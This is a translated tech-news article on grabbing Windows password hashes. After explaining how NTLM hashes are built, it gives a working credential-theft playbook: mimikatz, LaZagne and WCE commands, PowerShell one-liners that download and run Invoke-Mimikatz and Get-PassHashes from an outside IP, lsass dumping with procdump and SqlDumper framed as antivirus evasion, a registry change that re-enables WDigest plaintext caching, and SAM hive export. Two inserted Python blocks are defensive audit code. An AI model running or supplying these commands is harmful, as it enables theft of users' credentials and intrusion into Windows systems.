2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
Today I will talk about how Windows hashes are grabbed. Many people may not know much about it, so I have summarized the following for everyone; I hope this article is useful to you.
Windows password
A Windows password hash consists of two parts, the LM hash and the NTLM hash, which are two different hashing methods applied to the same password.
A dumped entry has the format: username:RID:LM-HASH:NTLM-HASH
The NTLM hash is generated as follows:
1. Convert the plaintext password to its hexadecimal (ASCII byte) form
2. Convert it to Unicode (UTF-16LE) by appending 0x00 after each byte
3. Hash the Unicode string with MD4, which produces a 128-bit digest written as 32 hexadecimal characters
For example:
Account password: cseroad@2008
Hexadecimal: 637365726f61644032303038
Unicode string: 63007300650072006f006100640040003200300030003800
NTLM hash: 82c58d8cec50de01fd109613369c158e
The LM hash (LAN Manager hash) is Microsoft's older hashing algorithm, essentially built on DES encryption; refer to LM-Hash & NTLM-Hash for the details.
An LM hash of AAD3B435B51404EEAAD3B435B51404EE indicates an empty password or that the LM hash is not stored.
I won't go into it further here, because the LM hash has been disabled since Windows Server 2008.
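The following is an added example written for this page; it is not the article's own code nor code from any tool the article lists. It implements the three NTLM hash steps above in Python, with MD4 written out per RFC 1320 so no OpenSSL legacy provider is needed, and it parses lines in the username:RID:LM-hash:NTLM-hash layout to flag the two sentinel values a defender looks for when reviewing such a dump: the empty LM hash given above and the NT hash of an empty password (31d6cfe0d16ae931b73c59d7e0c089c0, which is MD4 of zero bytes). The account names, RIDs and the LM value on the "legacy" line are constructed; running the script lets you compare the printed NT hash with the value the article gives.

```python
"""NT hash construction and a pwdump-format audit (added example, not from
the article). Re-implements the article's NTLM-Hash steps (hex bytes,
UTF-16LE, MD4) and parses username:RID:LM-hash:NTLM-hash lines, flagging
blank passwords and accounts that still carry an LM hash. Sample lines
are constructed."""
import struct

MASK32 = 0xFFFFFFFF

# Sentinels: the LM value the article gives for "no password / LM not stored",
# and the NT hash of "" (MD4 of zero bytes, an RFC 1320 test vector).
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320: pad, then three rounds of 16 steps per 64-byte block."""
    msg = bytearray(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    # One tuple per round: (function, additive constant, message-word order, shifts)
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )

    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for fn, k, order, shifts in rounds:
            for i, w in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[w] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate register roles for the next step
        A, B, C, D = ((A + a) & MASK32, (B + b) & MASK32,
                      (C + c) & MASK32, (D + d) & MASK32)
    return struct.pack("<4I", A, B, C, D)


def utf16le_hex(password: str) -> str:
    """Step 2 of the article. For ASCII this is exactly each byte followed by
    0x00; for non-ASCII characters UTF-16LE is the general rule Windows applies."""
    return password.encode("utf-16-le").hex()


def nt_hash(password: str) -> str:
    """Step 3 of the article: MD4 over the UTF-16LE bytes, as 32 hex characters."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line: str) -> dict:
    """Parse 'username:RID:LM-hash:NTLM-hash' (the layout the article gives)."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError(f"not a pwdump-style line: {line!r}")
    lm, nt = parts[2].lower(), parts[3].lower()
    return {
        "user": parts[0],
        "rid": int(parts[1]),
        "lm_hash_present": lm != EMPTY_LM_HASH,  # legacy LM hash still stored
        "blank_password": nt == EMPTY_NT_HASH,   # NT hash of "" => no password set
    }


def audit_dump(lines):
    """Findings for every non-comment line; a defender acts on either flag."""
    return [parse_pwdump_line(l) for l in lines if l.strip() and not l.startswith("#")]


# Constructed sample (not from any real host); the LM value on 'legacy' is a
# made-up placeholder, the NT values are computed here.
SAMPLE_DUMP = [
    "# constructed pwdump-format lines",
    f"Administrator:500:{EMPTY_LM_HASH}:{nt_hash('cseroad@2008')}:::",
    f"Guest:501:{EMPTY_LM_HASH}:{EMPTY_NT_HASH}:::",
    f"legacy:1001:0123456789abcdef0123456789abcdef:{nt_hash('cseroad@2008')}:::",
]

if __name__ == "__main__":
    pw = "cseroad@2008"
    print("hex     :", pw.encode("ascii").hex())
    print("utf16le :", utf16le_hex(pw))
    print("NT hash :", nt_hash(pw))
    for finding in audit_dump(SAMPLE_DUMP):
        print(finding)
```

Two points worth noting from the code: the article's "add 0x00 after each byte" description only holds for ASCII passwords, and UTF-16LE is what actually gets hashed for anything else; and the MD4 routine is checked against the RFC 1320 vectors (empty input and "abc"), which is what makes the computed NT hash trustworthy. In a dump review, a blank_password finding or an lm_hash_present finding on a modern host is a configuration weakness to fix, independent of which tool produced the lines.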
Tools to get the hash
Principle: the lsass.exe process implements Windows security policy (local security policy and logon policy). Tools can export hash values and plaintext passwords from the memory of the lsass.exe process or from the SAM file. The SAM file is stored in the C:\Windows\System32\config directory and is locked while the system is running, so it cannot simply be copied.
All of the following tools are run as administrator.
QuarksPwDump tool
The tool supports Windows XP/2003/Vista/7/2008 and is fairly stable.
It can capture many types of user credentials on the Windows platform, including local accounts, domain accounts and cached domain accounts.
Download address: codeload.github.com/quarkslab/quarkspwdump/zip/master
The full source code is available at https://github.com/quarkslab/quarkspwdump
Quarkspwdump.exe --dump-hash-local    Export the NTLM hashes of local users
LaZagne tool
LaZagne is an open source application for retrieving passwords stored locally on a computer.
It can capture not only Windows passwords but also browser-cached passwords, SVN passwords, Wi-Fi passwords, email passwords and more. It works on Windows, Linux and macOS.
Download address: https://github.com/AlessandroZ/LaZagne
Run command:
LaZagne.exe all
getpass.exe tool
This tool was compiled by Lightning Boy on the basis of mimikatz and can obtain plaintext passwords directly. Simply run getpass.exe.
Pwdump7.exe tool
Copy libeay32.dll and Pwdump7.exe into the same directory and run Pwdump7.exe directly.
WCE tool
The tool comes in 32-bit and 64-bit versions. It enumerates logon sessions and can add, change and delete credentials. The commands are:
wce.exe -w    Read system plaintext passwords
wce.exe -l    Get hashes
PowerShell script Get-PassHashes.ps1
Run directly from cmd:
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Get-PassHashes.ps1');Get-PassHashes
The same script from the nishang Gather directory:
powershell iex (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes
Invoke-Mimikatz.ps1 script
Still uses mimikatz to read passwords:
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
Out-Minidump.ps1 script
Gets a dump of lsass.exe:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"
Then use mimikatz to get the plaintext from the dump:
mimikatz.exe "sekurlsa::minidump lsass_528.dmp" "sekurlsa::logonPasswords full" exit
mimikatz tool
It can be used to grab hashes and plaintext. The command is:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
On Windows 10 or 2012 R2 and above, plaintext passwords are no longer cached in memory by default. In that case plaintext can be retrieved again by modifying the registry, but the user must log on again before it can be retrieved successfully. The registry command is:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Credentials can be captured after a restart.
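Because the registry change above is the setting a defender most wants to detect, here is an added example (written for this page, not from the article) that evaluates the WDigest UseLogonCredential value from the text printed by `reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential`, so output collected from many hosts can be checked offline. It treats a missing value as the default (disabled) on the Windows versions the article names. The three sample outputs are constructed in reg.exe's layout.

```python
"""Audit WDigest plaintext caching from 'reg query' output (added example,
not from the article). Parses the text reg.exe prints for
HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential.
The sample outputs are constructed."""
import re

# Matches the value line, e.g. "    UseLogonCredential    REG_DWORD    0x1"
_VALUE_RE = re.compile(
    r"^\s*UseLogonCredential\s+REG_DWORD\s+(0x[0-9A-Fa-f]+|\d+)\s*$", re.MULTILINE)


def use_logon_credential(reg_output: str):
    """The DWORD as an int, or None when the value does not exist."""
    m = _VALUE_RE.search(reg_output)
    return int(m.group(1), 0) if m else None


def wdigest_plaintext_enabled(reg_output: str) -> bool:
    """True only when UseLogonCredential is explicitly 1 (what the article's
    'reg add' command writes). On Windows 10 / 2012 R2 and later a missing
    value means the default, which is disabled."""
    return use_logon_credential(reg_output) == 1


# Constructed samples in reg.exe's output format.
HARDENED_HOST = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest
    UseLogonCredential    REG_DWORD    0x0
"""
WEAKENED_HOST = HARDENED_HOST.replace("0x0", "0x1")
DEFAULT_HOST = "ERROR: The system was unable to find the specified registry key or value."

if __name__ == "__main__":
    for name, out in (("hardened", HARDENED_HOST), ("weakened", WEAKENED_HOST),
                      ("default", DEFAULT_HOST)):
        state = "plaintext caching ENABLED" if wdigest_plaintext_enabled(out) else "disabled"
        print(f"{name}: {state}")
```

The hardened state is an explicit 0; a host where the value reads 0x1 has been weakened in exactly the way the command above does, and an alert on that write (or on the value's presence) is a cheap, high-signal detection.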
Getting hashes from the SAM table
Export the SAM and System hives:
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
Export the SAM and System files of the registry to the local disk, then use mimikatz to read the SAM and System files; the NTLM hashes become available:
mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit
Metasploit framework
Once a session has been obtained, try to grab the hash values. Metasploit supports several ways of fetching hashes.
1. The hashdump command can grab hashes with SYSTEM privileges.
2. The windows/gather/smart_hashdump module gets the user hashes in the domain
and exports all hashes to /root/.msf4/loot/20200218155855_default_10.211.55.16_windows.hashes_396577.txt
3. The load mimikatz command loads mimikatz; its sub-commands are:
msv    Get hashes
kerberos    Get plaintext
ssp    Get plaintext information
tspkg    Attempt to retrieve tspkg credentials
wdigest    Attempt to retrieve wdigest credentials
mimikatz_command -f samdump::hashes    Get hashes
mimikatz_command -f sekurlsa::searchPasswords    Get plaintext passwords
Cobalt Strike framework
Dump Hashes    # Get hashes
Run Mimikatz    # Run mimikatz
The beacon commands executed behind these menu items are:
hashdump    Get hash values
logonPasswords    equivalent to mimikatz_command -f sekurlsa::searchPasswords
Empire framework
Empire also has built-in mimikatz for reading hashes.
procdump.exe tool (antivirus evasion)
This tool is produced by Microsoft and is to some extent not flagged by antivirus. Use procdump to export the memory of the lsass process locally, then use mimikatz to read the passwords locally.
procdump.exe -accepteula -ma lsass.exe lsass.dmp    produces lsass.dmp
Then use mimikatz to read the passwords:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
Note that the lsass.dmp exported from the target machine needs to be read on a system running the same version of Windows.
SqlDumper.exe tool
This tool is also a Microsoft product and is also to some extent not flagged by antivirus.
SqlDumper.exe is stored by default in C:\Program Files\Microsoft SQL Server\number\Shared, where number is the SQL Server version. If SQL Server is not installed on the target machine, upload SqlDumper.exe yourself.
tasklist /svc | findstr lsass.exe    View the process ID of lsass.exe
Sqldumper.exe ProcessID 0 0x01100    Export the dump file
Load the dump file in mimikatz:
mimikatz.exe "sekurlsa::minidump SQLDmpr0002.mdmp" "sekurlsa::logonPasswords full" exit
SharpDump tool
A compiled C# version of the Out-Minidump.ps1 script.
It exports the lsass.exe process data to a dump file with the suffix .bin; copy that file to the local machine, rename it to .zip, decompress it, and read it with the local mimikatz.
mimikatz.exe "sekurlsa::minidump debug520" "sekurlsa::logonPasswords full" "exit"
After reading the above, do you have a better understanding of how Windows hashes are grabbed? If you want to learn more, please follow the industry information channel; thank you for your support.